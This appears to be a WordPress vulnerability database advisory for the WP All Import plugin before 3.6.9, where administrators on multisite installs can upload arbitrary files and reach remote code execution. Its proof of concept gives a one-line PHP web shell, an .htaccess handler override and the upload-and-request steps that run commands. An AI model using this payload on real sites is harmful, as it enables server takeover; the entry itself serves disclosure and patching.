WordPress Plugin Vulnerabilities
WP All Import < 3.6.9 - Admin+ Arbitrary File Upload to RCE
Description
The plugin is not properly filtering which file extensions are allowed to be imported on the server, which could allow administrators in multi-site WordPress installations to upload arbitrary files
Proof of Concept
[1] Create 'poc.zip' with 2 files like below [1-1] 'exploit.php.txt' is as follows. ---------------------------------- <?php system($_GET['cmd']); ?> ---------------------------------- [1-2] '.htaccess' is as follows. ---------------------------------- <IfModule mod_rewrite.c> AddHandler application/x-httpd-php .php .html </IfModule> ---------------------------------- [2] Upload the 'poc.zip' via the button [Upload a file] on 'http://localhost/wp-admin/admin.php?page=pmxi-admin-import' [3] Access 'http://localhost/wp-content/uploads/wpallimport/uploads/fa5b307edb3ccdd2244b2b60b1d9c0ee/exploit.php.txt?cmd=id' in order to execute arbitrary commands. * fa5b307edb3ccdd2244b2b60b1d9c0ee is a random string from the server response.
Affects Plugins
References
CVE
Classification
Type
RCE
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
lucy
Submitter
lucy
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-10-14 (about 1 years ago)
Added
2022-10-15 (about 1 years ago)
Last Updated
2022-10-17 (about 1 years ago)